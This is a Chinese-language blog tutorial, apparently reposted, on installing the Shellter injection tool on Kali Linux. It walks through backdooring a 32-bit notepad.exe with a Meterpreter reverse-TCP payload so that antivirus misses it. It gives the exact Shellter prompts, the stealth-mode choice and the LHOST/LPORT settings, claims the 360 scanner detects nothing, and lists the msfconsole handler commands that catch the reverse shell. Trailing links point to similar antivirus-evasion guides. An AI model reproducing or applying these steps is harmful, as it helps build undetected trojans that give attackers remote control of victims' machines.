linux免杀工具,kali 免杀工具shellter安装以及使用
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀
官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话
就需要安装wine环境来运行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可执行文件
开始安装:
1. apt-get update //更新一下
2. apt-get install shellter //直接apt在线安装
安装完成后 ,终端直接输入shellter打开会报错,根据提示 我们直接执行命令dpkg --add-architecture i386 && apt-get update && apt-get install wine32
确认安装即可
现在我们打开shellter就可以打开运行了,工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹
shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。
免杀实验:
Choose Operation Mode - Auto/Manual (A/M/H):A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助
PE Target:/home/notepad.exe // 注入的程序 这里已windows系统自带的32位记事本程序举例
Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式 输入Y启用
Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload
Select payload by index: 1 //选择第一个
SET LHOST: 192.168.37.137 //设置反弹回来的IP 本机
SET LPORT:4444 //设置接收反弹的端口
这样我们的木马后门shellcode就注入到这个文件里去了,
开启360全部查杀引擎,更新病毒库,查杀一下试试效果,没有任何提示。
打开msf,进行配置,
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost192.168.37.137set lport4444exploit //监听
这时运行带有后门的notepad.exe文件后,控制端成功连接上来,接下来就可以随意操作了。
来源:oschina
链接:https://my.oschina.net/u/4334817/blog/4283482
linux免杀工具,kali 免杀工具shellter安装以及使用相关推荐
- Kail Linux渗透测试教程之免杀Payload生成工具Veil
Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...
- 远控免杀专题12--Green-Hat-Suite免杀
0x01 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...
- 远控免杀专题6---Venom免杀
0x01 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...
- 远控免杀专题8---BackDoor-Facktory免杀
0x01 免杀能力一查表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...
- 远控免杀专题11-Avoidz免杀
0x01 免杀能力一查表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- 杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩(论杀或者不杀 )
杀毒软件的查杀病毒的原理以及木马.病毒的免杀伎俩(论杀或者不杀 ) 无意中在网上看到的,描述通俗易懂,基本全是基础知识,权当了解吧. ================================= ...
- Metasploit+python生成免杀exe过360杀毒
Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reve ...
- 小七免杀 源码免杀培训班
被杀毒软件误杀 为什么不学习免杀呢?小七免杀论坛 2013年源码免杀培训课程,带你走进杀毒软件的世界. 百度网盘:http://pan.baidu.com/s/1i3yxshB 提取密码:tt0q 第 ...
- Kali Linux - 嗅探和欺骗及密码破解工具
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 Burpsuite mitmproxy Wireshark SSLSTRIP Hydra Johnny John 总结 Bu ...
最新文章
- Flink-java读取Kafka(转载+自己验证)
- ioslabel阴影_UILabel的内阴影
- [react] 和Component两者的区别是什么
- SpringBoot 集成 MyBatisPlus 模板
- ios 监测网页按钮_苹果IOS备忘录便签软件敬业签恢复删除内容应该怎么操作?...
- 强悍的 ubuntu —— 常用工具
- jQuery的介绍和选择器详解
- 多智能体强化学习—QMIX
- 【软技能】完全写作指南--简历
- 微型计算机三部分基本组成,微型计算机的基本组成-电脑自学网
- Linux内核4.14版本——alsa框架分析(3)-PCM设备的创建
- win10怎么在注册表中修改图片查看方式
- chloe.mysql 源码_AceFx-基于Nfine的Chloe官网及后台源码
- C++ 全局变量 静态全局变量 傻傻分不清
- 【问题解决】虚拟机打开gazebo黑屏、闪退、模型加载不出来
- 一些基于新闻表示和用户表示的新闻推荐模型总结:NPA/ NAML/ LSTUR/ NRMS
- css3实现旋转魔方
- 自媒体运营之【流量的价值】
- mysql 获取当前日期 所在周的周一和周日
- python实现rar解压和压缩
热门文章
- Cisco Packet Tracer路由器的基本配置
- I LOVE YOU TOO密码解析
- w ndows7旗舰版网卡驱动,windows7万能网卡驱动官方下载
- 2008r2服务器频繁自动重启,关于Windows server2008频繁重启问题
- 计算机控制实验 实验十,自控计控原理实验箱
- MATLAB图像分割——标记分水岭分割算法
- 社团管理系统(part1)
- Qt实践2: 简易计算器
- delphi 发送html邮件,Delphi下html编辑器,像foxmail或者Outlook的邮件编辑器一样 能够保存为单一文件如 mht,eml (200分)...
- 软件测试工程师经典面试题